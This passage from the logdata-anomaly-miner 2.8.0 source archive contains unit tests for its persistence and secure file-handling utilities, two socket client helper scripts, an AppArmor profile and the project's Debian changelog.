""" if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/PersistenceUtilTest.py000066400000000000000000000210621500476301700272720ustar00rootroot00000000000000import unittest import sys import os import tempfile from io import StringIO from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from aminer.util import PersistenceUtil from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.util import SecureOSFunctions from unit.TestBase import TestBase class PersistenceUtilTest(TestBase): """Unittests for the PersistenceUtil class.""" def test1add_persistable_component(self): """ Add a component to the registry of all persistable components. Also test the type of the component, as this task is only performed once for each component. """ old_stderr = sys.stderr sys.stderr = StringIO() # component is not PersistableComponentInterface (raise TypeError) some_object = {"key": "this is not working"} self.assertRaises(TypeError, PersistenceUtil.add_persistable_component(some_object)) # working example - the component is added implicitly. nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Test", True) # check persistence ID warning PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = False PersistenceUtil.add_persistable_component(nmpd) self.assertEqual(sys.stderr.getvalue(), 'Warning: Detectors of type NewMatchPathDetector use the persistence_id "Test" multiple' ' times. 
Please assign a unique persistence_id for every component.\n') self.reset_output_stream() PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = True PersistenceUtil.add_persistable_component(nmpd) self.assertEqual(self.output_stream.getvalue(), "") sys.stderr = old_stderr def test2open_persistence_file(self): """Test opening a persistence file. Also check if the type of the file_name is string or bytes.""" # test type checks file = "/tmp/persistence" PersistenceUtil.open_persistence_file(file, os.O_RDONLY | os.O_NOFOLLOW | os.O_CREAT) os.remove(file) PersistenceUtil.open_persistence_file(file.encode(), os.O_RDONLY | os.O_NOFOLLOW | os.O_CREAT) os.remove(file) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, 123, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, 123.22, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, True, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, None, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, {"id": "Default"}, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, ["Default"], os.O_RDONLY | os.O_NOFOLLOW) # path does not exist (O_CREAT flag not set) self.assertRaises(FileNotFoundError, PersistenceUtil.open_persistence_file, file, os.O_RDONLY | os.O_NOFOLLOW) # path does not exist (O_CREAT flag set) - repeat if it exists and check if fd is returned fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY | os.O_NOFOLLOW | os.O_CREAT) self.assertIsNotNone(fd) # path exists fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY | os.O_NOFOLLOW) self.assertIsNotNone(fd) os.remove(file) def test3replace_persistence_file(self): """Test replacing the name of the persistence file.""" # path does not exist file = "/tmp/persistence" fd, _ = 
tempfile.mkstemp(dir=SecureOSFunctions.tmp_base_dir_path) os.write(fd, b"file2") PersistenceUtil.replace_persistence_file(file, fd) fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY) self.assertEqual(os.read(fd, 50), b"file2") os.close(fd) # path exists fd = PersistenceUtil.open_persistence_file(file, os.O_WRONLY | os.O_CREAT) os.write(fd, b"file1") os.close(fd) fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY) self.assertEqual(os.read(fd, 50), b"file1") os.close(fd) fd, _ = tempfile.mkstemp(dir=SecureOSFunctions.tmp_base_dir_path) os.write(fd, b"file2") PersistenceUtil.replace_persistence_file(file, fd) fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY | os.O_NOFOLLOW) self.assertEqual(os.read(fd, 50), b"file2") os.remove(file) def test4load_json(self): """Load persisted json data.""" # path does not exist file = "/tmp/persistence" self.assertEqual(PersistenceUtil.load_json(file), None) # json data corrupted fd = PersistenceUtil.open_persistence_file(file, os.O_WRONLY | os.O_CREAT) os.write(fd, b"file1") os.close(fd) self.assertRaises(ValueError, PersistenceUtil.load_json, file) # working example fd = PersistenceUtil.open_persistence_file(file, os.O_WRONLY) os.write(fd, b'{"key": "value"}') os.close(fd) data = PersistenceUtil.load_json(file) self.assertEqual(data, {"key": "value"}) os.remove(file) def test5store_json(self): """Store json data into the persistence file.""" # json data corrupted file = "/tmp/persistence" PersistenceUtil.store_json(file, b"file") fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY) self.assertEqual(os.read(fd, 50), b'"bytes:file"') os.close(fd) os.remove(file) def test6create_missing_directories(self): """Test if all missing directories are created.""" # only base directory exists file = "/tmp/persistence/data1/data2" PersistenceUtil.create_missing_directories(file) self.assertTrue(os.path.exists("/tmp/persistence/data1")) self.assertFalse(os.path.exists("/tmp/persistence/data1/data2")) # 
path already exists PersistenceUtil.create_missing_directories(file) self.assertTrue(os.path.exists("/tmp/persistence/data1")) self.assertFalse(os.path.exists("/tmp/persistence/data1/data2")) os.rmdir("/tmp/persistence/data1") os.rmdir("/tmp/persistence") def test7clear_persistence(self): """Test if clearing the persistence data works properly.""" base_path = "/tmp/persistence" os.mkdir(base_path) os.mkdir(os.path.join(base_path, "backup")) os.mkdir(os.path.join(base_path, "data1")) os.mkdir(os.path.join(base_path, "data2")) fd = PersistenceUtil.open_persistence_file(os.path.join(base_path, "data1", "file1.txt"), os.O_WRONLY | os.O_CREAT) os.close(fd) PersistenceUtil.clear_persistence(base_path) self.assertTrue(os.path.exists(os.path.join(base_path, "backup"))) self.assertFalse(os.path.exists(os.path.join(base_path, "data1"))) self.assertFalse(os.path.exists(os.path.join(base_path, "data2"))) self.assertFalse(os.path.exists(os.path.join(base_path, "data1", "file1.txt"))) os.rmdir(os.path.join(base_path, "backup")) os.rmdir(base_path) def test8copytree(self): """Test if our copytree is working as expected even when the destination directory is existing.""" # destination directory not existing base_path = "/tmp/persistence" new_base_path = "/tmp/persistence1" os.mkdir(base_path) os.mkdir(os.path.join(base_path, "backup")) PersistenceUtil.copytree(base_path, new_base_path) self.assertTrue(os.path.exists(os.path.join(base_path, "backup"))) self.assertTrue(os.path.exists(os.path.join(new_base_path, "backup"))) # destination directory existing self.assertRaises(FileExistsError, PersistenceUtil.copytree, base_path, new_base_path) PersistenceUtil.clear_persistence(base_path) PersistenceUtil.copytree(os.path.join(base_path, "backup"), os.path.join(new_base_path, "backup")) os.rmdir(os.path.join(base_path, "backup")) os.rmdir(base_path) os.rmdir(os.path.join(new_base_path, "backup")) os.rmdir(new_base_path) if __name__ == "__main__": unittest.main() 
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/SecureOSFunctionsTest.py000066400000000000000000000217771500476301700275460ustar00rootroot00000000000000import unittest import sys import os import socket import subprocess from _io import StringIO import fcntl from aminer.util import SecureOSFunctions from aminer.input.LogStream import UnixSocketLogDataResource from unit.TestBase import TestBase class SecureOSFunctionsTestLocal(TestBase): """This test class must be run locally due to import problems.""" def setUp(self): super().setUp() if SecureOSFunctions.base_dir_fd is not None: SecureOSFunctions.close_base_directory() SecureOSFunctions.base_dir_fd = None SecureOSFunctions.tmp_base_dir_fd = None SecureOSFunctions.log_dir_fd = None SecureOSFunctions.base_dir_path = None SecureOSFunctions.tmp_base_dir_path = None SecureOSFunctions.log_dir_path = None def tearDown(self): """Reset all global variables.""" super().tearDown() SecureOSFunctions.base_dir_fd = None SecureOSFunctions.tmp_base_dir_fd = None SecureOSFunctions.log_dir_fd = None SecureOSFunctions.base_dir_path = None SecureOSFunctions.tmp_base_dir_path = None SecureOSFunctions.log_dir_path = None def test1secure_open_close_base_directory(self): self.assertRaises(ValueError, SecureOSFunctions.secure_open_base_directory) self.assertRaises(ValueError, SecureOSFunctions.secure_open_base_directory, "base/directory") base_dir_fd = SecureOSFunctions.secure_open_base_directory("/tmp/lib/aminer") self.assertIsNotNone(SecureOSFunctions.base_dir_fd) self.assertIsNotNone(SecureOSFunctions.tmp_base_dir_fd) self.assertIsNotNone(SecureOSFunctions.base_dir_path) self.assertIsNotNone(SecureOSFunctions.tmp_base_dir_path) self.assertEqual(base_dir_fd, SecureOSFunctions.secure_open_base_directory("/tmp/lib/aminer")) self.assertEqual(os.O_NOFOLLOW | os.O_DIRECTORY, fcntl.fcntl(SecureOSFunctions.base_dir_fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)) # os.O_NOCTTY is not included, because it is no terminal 
controlling device. self.assertEqual(os.O_NOFOLLOW | os.O_DIRECTORY, fcntl.fcntl(SecureOSFunctions.tmp_base_dir_fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. self.assertIsNotNone(SecureOSFunctions.base_dir_fd) self.assertIsNotNone(SecureOSFunctions.tmp_base_dir_fd) self.assertIsNotNone(SecureOSFunctions.base_dir_path) self.assertIsNotNone(SecureOSFunctions.tmp_base_dir_path) SecureOSFunctions.close_base_directory() self.assertIsNone(SecureOSFunctions.base_dir_fd) self.assertIsNone(SecureOSFunctions.tmp_base_dir_fd) self.assertIsNone(SecureOSFunctions.base_dir_path) SecureOSFunctions.close_base_directory() # no exception should be raised def test2secure_open_close_log_directory(self): self.assertRaises(ValueError, SecureOSFunctions.secure_open_log_directory) self.assertRaises(ValueError, SecureOSFunctions.secure_open_log_directory, "base/directory") SecureOSFunctions.secure_open_log_directory("/tmp/lib/aminer/util/log") self.assertIsNotNone(SecureOSFunctions.log_dir_fd) self.assertIsNotNone(SecureOSFunctions.log_dir_path) self.assertEqual(os.O_NOFOLLOW | os.O_DIRECTORY, fcntl.fcntl(SecureOSFunctions.log_dir_fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. 
SecureOSFunctions.close_log_directory() self.assertIsNone(SecureOSFunctions.log_dir_fd) self.assertIsNone(SecureOSFunctions.log_dir_path) SecureOSFunctions.secure_open_base_directory("/tmp/lib/aminer/util") SecureOSFunctions.secure_open_log_directory("/tmp/lib/aminer/util/log") SecureOSFunctions.close_log_directory() SecureOSFunctions.close_base_directory() def test3secure_open_file(self): file = open("/tmp/lib/aminer/util/log/test.log", "w") file.close() self.assertRaises(ValueError, SecureOSFunctions.secure_open_file, "base/directory", os.O_NOFOLLOW | os.O_NOCTTY) self.assertRaises(Exception, SecureOSFunctions.secure_open_file, "/tmp/lib/aminer/util/log", os.O_NOFOLLOW | os.O_NOCTTY) fd = SecureOSFunctions.secure_open_file("/tmp/lib/aminer/util/log", os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) self.assertEqual(os.O_NOFOLLOW | os.O_DIRECTORY, fcntl.fcntl(fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. os.close(fd) fd = SecureOSFunctions.secure_open_file("/tmp/lib/aminer/util/log/test.log", os.O_NOFOLLOW | os.O_NOCTTY) self.assertEqual(os.O_NOFOLLOW, fcntl.fcntl(fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. os.close(fd) SecureOSFunctions.secure_open_base_directory("/tmp/lib/aminer/util") fd = SecureOSFunctions.secure_open_file("/tmp/lib/aminer/util/log/test.log", os.O_NOFOLLOW | os.O_NOCTTY) self.assertEqual(os.O_NOFOLLOW, fcntl.fcntl(fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. os.close(fd) SecureOSFunctions.close_base_directory() def test4send_annotated_file_descriptor(self): """A valid annotated file descriptor is to be sent by a socket.""" sock_name = '/tmp/test4unixSocket.sock' data = b'readmeStream' + b'\x00' + b'You should read these README instructions for better understanding.' 
proc = subprocess.Popen(['python3', 'unit/util/clientTest4.py']) if os.path.exists(sock_name): os.remove(sock_name) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix:///tmp/test4unixSocket.sock', connection.fileno()) unix_socket_log_data_resource.fill_buffer() self.assertEqual(unix_socket_log_data_resource.buffer, data) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 80) self.assertEqual(unix_socket_log_data_resource.buffer, b'') proc.wait() connection.close() server.close() def test5send_annotated_file_descriptor_invalid_parameters(self): """Invalid access is to be performed by using a closed socket.""" fd = SecureOSFunctions.secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) self.assertRaises(OSError, SecureOSFunctions.send_annotated_file_descriptor, client, fd, b'readmeStream', b'You should read these README instructions for better understanding.') client.close() def test6send_logstream_descriptor(self): """A valid logstream descriptor is to be sent.""" sock_name = '/tmp/test6unixSocket.sock' data = b'logstream' + b'\x00' + b'/var/log/syslog' proc = subprocess.Popen(['python3', 'unit/util/clientTest6.py']) if os.path.exists(sock_name): os.remove(sock_name) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix:///tmp/test6unixSocket.sock', connection.fileno()) unix_socket_log_data_resource.fill_buffer() self.assertEqual(unix_socket_log_data_resource.buffer, data) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) 
self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 25) self.assertEqual(unix_socket_log_data_resource.buffer, b'') proc.wait() connection.close() server.close() def test7receive_annotated_file_descriptor(self): """A valid annotated file descriptor is to be received by a socket.""" sock_name = '/tmp/test6unixSocket.sock' type_info = b'logstream' path = b'/var/log/syslog' data = (type_info, path) proc = subprocess.Popen(['python3', 'unit/util/clientTest6.py']) if os.path.exists(sock_name): os.remove(sock_name) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] data_tuple = SecureOSFunctions.receive_annotated_file_descriptor(connection) self.assertEqual(data_tuple[1], data[0]) self.assertEqual(data_tuple[2], data[1]) self.assertEqual(len(data_tuple[1]) + len(data_tuple[2]), 24) proc.wait() connection.close() server.close() if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/__init__.py000066400000000000000000000000001500476301700250340ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/clientTest4.py000066400000000000000000000010711500476301700255100ustar00rootroot00000000000000from time import sleep import socket import sys import os sys.path.append('./') sys.path.append('../../') from aminer.util.SecureOSFunctions import secure_open_file, send_annotated_file_descriptor sock_name = '/tmp/test4unixSocket.sock' fd = secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) send_annotated_file_descriptor(client, fd, b'readmeStream', b'You should read these README instructions for better understanding.') client.close() os.close(fd) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/clientTest6.py000066400000000000000000000007261500476301700255200ustar00rootroot00000000000000from time import 
sleep import socket import sys import os sys.path.append('../../') sys.path.append('./') from aminer.util.SecureOSFunctions import secure_open_file, send_logstream_descriptor sock_name = '/tmp/test6unixSocket.sock' fd = secure_open_file(b'/var/log/syslog', os.O_RDONLY) sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) send_logstream_descriptor(client, fd, b'/var/log/syslog') client.close() os.close(fd) logdata-anomaly-miner-2.8.0/apparmor.profile000066400000000000000000000010041500476301700211030ustar00rootroot00000000000000# Last Modified: Wed Feb 19 14:58:42 2025 abi , include /usr/lib/logdata-anomaly-miner/aminer.py { include include include include include capability dac_override, /usr/bin/dash ix, /usr/bin/dpkg-divert mrix, /usr/bin/fgrep mrix, /usr/bin/python3.12 ix, /usr/lib/logdata-anomaly-miner/aminer.py Px, /usr/lib/logdata-anomaly-miner/aminer.py r, } logdata-anomaly-miner-2.8.0/changelog000066400000000000000000000611361500476301700175660ustar00rootroot00000000000000logdata-anomaly-miner (2.8.0) unstable; urgency=low Bugfixes: * fix suspendModeTest * fix issues with np.math * fix AMINERSRC variable in aminer_install script * fix error message in ByteStreamLineAtomizer * Fix stop_learning_time * Fix closing of Zmq producer socket at graceful shutdown * Fix sorting of None values in NMPVCD.do_persist() Changes: * Rewrite of aminerwrapper * Set latest working python-kafka version * Remove restrictive flags in aminer, so the conf-enabled directory is not needed any more -> still need to keep conf-enabled to use custom parsing models * Allow resource_name to be of type bytes * Allow ParserMatch to be None in LogAtom * Improve LogResourceList error message when url does not start with file:// or unix:// * Add an optional log line identifier to json output * Remove proposed AminerStartTimestamp parameter and implement dynamic per detector stop_learning_time setup in NMPD * Implement dynamic per detector 
stop_learning_time setup * Add comment explaining the lambda function in the NMPVCD.do_persist() method -- Markus Wurzenberger Thu, 01 May 2025 12:00:00 +0000 logdata-anomaly-miner (2.7.0) unstable; urgency=low Bugfixes: * Fix broken links to python-modules * Fix initialization time index in EFD * Fix correct time index when learn mode is off * Fix edge case where confidence is divided by 0 in EventFrequencyDetector * Fix time until learn_mode is switched automatically * Fix issue where numerical values could not be used in CharsetDetector and EntropyDetector * Fix feature list order in PCA detector * Fix time index persistence in EFD * Fix last seen log in EFD * Fix newline parsing in json string values. * Fix issue of nested optional json dictionaries not parsing. Changes: * Implemented mechanism to allow granular configuration of LogResources. * Add seasonality to EFD * Add atom time in reset counter method * Add output_event_handlers parameter to the unparsed event handlers. * Add stop_learning_time and stop_learning_no_anomaly_time to schemas * Change id_path_list parameter to be optional in ValueRangeDetector. * Improve JsonModelElement parser * Add learn mode and detection thresholds in MatchValueAverageChangeDetector * Implement AminerId config property * Add LogResource to the json output of anomalies * Add use_real_time parameter to yaml config * Move manpages to Debian independent directory * Add ignore_log_resource parameter to analysis components. * Improved performance of JsonModelElement * Add XmlModelElement * Implement stop_learning_time parameters in MatchValueAverageChangeDetector. * Add support for Debian Bookworm * Updated to urllib 1.26.19 * Updated scipy to 1.10.0 * Extend missing timestamp warning in ByteStreamLineAtomizer. 
* Enhance timezones in DateTimeModelElement * Increase default persistence time * Add support for Redhat based Linux * Improved documentation -- Markus Wurzenberger Thu, 11 Jul 2024 12:00:00 +0000 logdata-anomaly-miner (2.6.1) unstable; urgency=low Changes: * minor refactoring * fixed code styling issues -- Markus Wurzenberger Tue, 21 Feb 2023 12:00:00 +0000 logdata-anomaly-miner (2.6.0) unstable; urgency=low Bugfixes: * fixed bug in JsonModelElement where the aminer gets stuck in an endless loop searching for \x. * added input file path sanitization and fixed exception handling. * fixed a test for the remote control save config method. * fixed bug that occurred when starting one of the detectors VTD, VCD and TSA with an already existing persistency of the ETD, but not of the detectors. * fixed the MissingMatchPathValueDetector by comparing the detector_info[0] instead of the old_last_seen_timestamp. * ParserCount: Fixed timestamp in output * implemented the output_logline parameter in the NewMatchPathValueDetector. * fixed bug where the MissingMatchPathListValueDetector could not be used in yaml, because the ConfigValidator could not load the module. * runHowToEntropyDetector had missing permissions on CFG_PATH in some lines. * fixed bug with closing the streams. Changes: * renamed schemas to python files. * enabled systemd autorestart * improved documentation * added SlidingEventFrequencyDetector * added timestamp_scale parameter to the DateTimeModelElement. * added unique path param for EFD * added check so EXP_TYPE_MANDATORY is enforced. 
* replace raw data output with last log of event type rather than end of time window * added event count cluster detector * added experimental jsonstringparser * improved parameter consistency * added ScoringEventHandler * EFD: Added the functionality to analyze the scoring_path_list with the ScoringEventHandler * ETD/TSA: Moved the initialization part of the TSA from the ETD to the TSA * support for ZeroMQ-Eventhandler * added support for named-pipes -- Markus Wurzenberger Fri, 20 Jan 2023 12:00:00 +0000 logdata-anomaly-miner (2.5.1) unstable; urgency=low Bugfixes: * EFD: Fixed problem that appears with empty windows * Fixed index out of range if matches are empty in JsonModelElement array. * EFD: Fixed problem that appears with empty windows * EFD: Enabled immediate detection without training, if both limits are set * EFD: Fixed bug related to auto_include_flag * Remove spaces in aminer logo * ParserCounter: Fixed do_timer * Fixed code to allow the usage of AtomFilterMatchAction in yaml configs * Fixed JsonModelElement when json object is null * Fix incorrect message of charset detector * Fix match list handling for json objects * Fix incorrect message of charset detector Changes: * Added nullable functionality to JsonModelElements * Added include-directive to supervisord.conf * ETD: Output warning when count first exceeds range * EFD: Added option to output anomaly when the count first exceeds the range * VTD: Added variable type 'range' * EFD: Added the function reset_counter * EFD: Added option to set the lower and upper limit of the range interval * Enhance EFD to consider multiple time windows * VTD: Changed the value of parameter num_updates_until_var_reduction to track all variables from False to 0. 
* PAD: Used the binom_test of the scipy package as test if the model should be reinitialized if fewer anomalies occur than are expected * Add ParsedLogAtom to aminer parser to ensure compatibility with lower versions * Added script to add build-id to the version-string * Support for installations from source in install-script * Fixed and standardized the persistence time of various detectors * Refactoring * Improve performance * Improve output handling * Improved testing -- Markus Wurzenberger Mon, 09 May 2022 12:00:00 +0000 logdata-anomaly-miner (2.5.0) unstable; urgency=low Bugfixes: * Fixed bug in YamlConfig Changes: * Added supervisord to docker * Moved unparsed atom handlers to analysis(yamlconfig) * Moved new_match_path_detector to analysis(yamlconfig) * Refactor: merged all UnparsedHandlers into one python-file * Added remotecontrol-command for reopening eventhandlers * Added config-parameters for logrotation * Improved testing -- Markus Wurzenberger Fri, 03 Dec 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.2) unstable; urgency=low Bugfixes: * PVTID: Fixed output format of previously appeared times * VTD: Fixed bugs (static -> discrete) * VTD: Fixed persistency-bugs * Fixed %z performance issues * Fixed error where optional keys with an array type are not parsed when being null * Fixed issues with JsonModelElement * Fixed persistence handling for ValueRangeDetector * PTSAD: Fixed a bug, which occurs, when the ETD stops saving the values of one analyzed path * ETD: Fixed the problem when entries of the match_dictionary are not of type MatchElement * Fixed error where json data instead of array was parsed successfully. 
Changes: * Added multiple parameters to VariableCorrelationDetector * Improved VTD * PVTID: Renamed parameter time_window_length to time_period_length * PVTID: Added check if atom time is None * Enhanced output of MTTD and PVTID * Improved docker-compose-configuration * Improved testing * Enhanced PathArimaDetector * Improved documentation * Improved KernelMsgParsingModel * Added pretty print for json output * Added the PathArimaDetector * TSA: Added functionality to discard arima models with too few log lines per time step * TSA: improved confidence calculation * TSA: Added the option to force the period length * TSA: Automatic selection of the pause area of the ACF * Extended EximGenericParsingModel * Extended AudispdParsingModel -- Markus Wurzenberger Tue, 23 Nov 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.1) unstable; urgency=low Bugfixes: * Fixed issues with array of arrays in JsonParser * Fixed problems with invalid json-output * Fixed ValueError in DTME * Fixed error with parsing floats in scientific notation with the JsonModelElement. 
* Fixed issue with paths in JsonModelElement * Fixed error with \x encoded json * Fixed error where EMPTY_ARRAY and EMPTY_OBJECT could not be parsed from the yaml config * Fixed a bug in the TSA when encountering a new event type * Fixed systemd script * Fixed encoding errors when reading yaml configs Changes: * Add entropy detector * Add charset detector * Add value range detector * Improved ApacheAccessModel, AudispdParsingModel * Refactoring * Improved documentation * Improved testing * Improved schema for yaml-config * Added EMPTY_STRING option to the JsonModelElement * Implemented check to report unparsed atom if ALLOW_ALL is used with data with a type other than list or dict -- Markus Wurzenberger Fri, 23 Jul 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.0) unstable; urgency=low Bugfixes: * Fixed error in JsonModelElement * Fixed problems with umlauts in JsonParser * Fixed problems with the start element of the ElementValueBranchModelElement * Fixed issues with the stat and debug command line parameters * Fixed issues if posix acl are not supported by the filesystem * Fixed issues with output for non ascii characters * Modified kafka-version Changes: * Improved command-line-options install-script * Added documentation * Improved VTD CM-Test * Improved unit-tests * Refactoring * Added TSAArimaDetector * Improved ParserCount * Added the PathValueTimeIntervalDetector * Implemented offline mode * Added PCA detector * Added timeout-parameter to ESD -- Markus Wurzenberger Fri, 04 Jun 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.1) unstable; urgency=low Bugfixes: * Replaced username and groupname with uid and gid for chown() * Removed hardcoded username and groupname -- Markus Wurzenberger Thu, 08 Apr 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.0) unstable; urgency=low Bugfixes: * Changed pyyaml-version to 5.4 * NewMatchIdValueComboDetector: Fix allow multiple values per id path * ByteStreamLineAtomizer: fixed encoding error * Fixed too many open 
directory-handles * Added close() function to LogStream Changes: * Added EventFrequencyDetector * Added EventSequenceDetector * Added JsonModelElement * Added tests for Json-Handling * Added command line parameter for update checks * Improved testing * Split yaml-schemas into multiple files * Improved support for yaml-config * YamlConfig: set verbose default to true * Various refactoring -- Markus Wurzenberger Mon, 29 Mar 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.1) unstable; urgency=low Bugfixes: * Fixed warnings due to files in Persistency-Directory * Fixed ACL-problems in dockerfile and autocreate /var/lib/aminer/log Changes: * added simple test for dockercontainer * negate result of the timeout-command. 1 is okay. 0 must be an error * added bullseye-tests * make tmp-dir in debian-bullseye-test and debian-buster-test unique -- Markus Wurzenberger Mon, 25 Jan 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.0) unstable; urgency=low Changes: * Added Dockerfile * Added checks for acl of persistency directory * Added VariableCorrelationDetector * Added tool for managing multiple persistency files * Added suppress-list for output * Added suspend-mode to remote-control * Added requirements.txt * Extended documentation * Extended yaml-configuration-support * Standardize command line parameters * Removed --Forground cli parameter * Fixed Security warnings by removing functions that allow race conditions * Refactoring * Ethically correct naming of variables * Enhanced testing * Added statistic outputs * Enhanced status info output * Changed global learn_mode behavior * Added RemoteControlSocket to yaml-config * Reimplemented the default mailnotificationhandler Bugfixes: * Fixed typos in documentation * Fixed issue with the AtomFilter in the yaml-config * Fixed order of ETD in yaml-config * Fixed various issues in persistency -- Markus Wurzenberger Fri, 18 Dec 2020 17:00:00 +0000 logdata-anomaly-miner (2.1.0) unstable; urgency=low Changes: * Added 
VariableTypeDetector,EventTypeDetector and EventCorrelationDetector * Added support for unclean format strings in the DateTimeModelElement * Added timezones to the DateTimeModelElement * Enhanced ApacheAccessModel * Yamlconfig: added support for kafka stream * Removed cpu limit configuration * Various refactoring * Yamlconfig: added support for more detectors * Added new command-line-parameters * Renamed executables to aminer.py and aminerremotecontroly.py * Run Aminer in forgroundd-mode per default * Added various unit-tests * Improved yamlconfig and checks * Added start-config for parser to yamlconfig * Renamed config templates * Removed imports from init.py for better modularity * Created AnalysisComponentsPerformanceTests for the EventTypeDetector * Extended demo-config * Renamed whitelist to allowlist * Added warnings for non-existent resources * Changed default of auto_include_flag to false Bugfixes: * Fixed some exit() in forks * Fixed debian files * Fixed JSON output of the AffectedLogAtomValues in all detectors * Fixed normal output of the NewMatchPathValueDetector * Fixed reoccuring alerting in MissingMatchPathValueDetector -- Markus Wurzenberger Thu, 05 Nov 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.2) unstable; urgency=low Changes: * Added help parameters * Added help-screen * Added version parameter * Adden path and value filter * Change time model of ApacheAccessModel for arbitrary time zones * Update link to documentation * Added SECURITY.md * Refactoring * Updated man-page * Added unit-tests for loadYamlconfig Bugfixes: * Fixed header comment type in schema file * Fix debian files -- Markus Wurzenberger Wed, 17 Jul 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.1) unstable; urgency=low Changes: * Updated documentation * Updated testcases * Updated demos * Updated debian files * Added copyright headers * Added executable bit to AMiner -- Markus Wurzenberger Wed, 24 Jun 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.0) bionic; urgency=low Changes: 
* Updated documentation * Added functions getNameByComponent and getIdByComponent to AnalysisChild.py * Update DefaultMailNotificationEventHandler.py to python3 * Extended AMinerRemoteControl * Added support for configuration in yaml format * Refactoring * Added KafkaEventHandler * Added JsonConverterHandler * Added NewMatchIdValueComboDetector * Enabled multiple default timestamp paths * Added debug feature ParserCount * Added unit and integration tests * Added installer script * Added VerboseUnparsedHandler Bugfixes including: * Fixed dependencies in Debian packaging * Fixed typo in various analysis components * Fixed import of ModelElementInterface in various parsing components * Fixed issues with byte/string comparison * Fixed issue in DecimalIntegerValueModelElement, when parsing integer including sign and padding character * Fixed unnecessary long blocking time in SimpleMultisourceAtomSync * Changed minum matchLen in DelimitedDataModelElement to 1 byte * Fixed timezone offset in ModuloTimeMatchRule * Minor bugfixes -- Markus Wurzenberger Fri, 29 May 2020 17:00:00 +0000 logdata-anomaly-miner (1.0.0) bionic; urgency=low Changes: * Ported code to Python 3 * Code cleanup using pylint * Added util/JsonUtil.py to encode byte strings for storing them as json objects * Added docs/development-procedures.txt which documents development procedures Features: * New MissingMatchPathListValueDetector to detect stream interuption * Added parsing support for kernel IP layer martian package messages * Systemd parsing of apt invocation messages. 
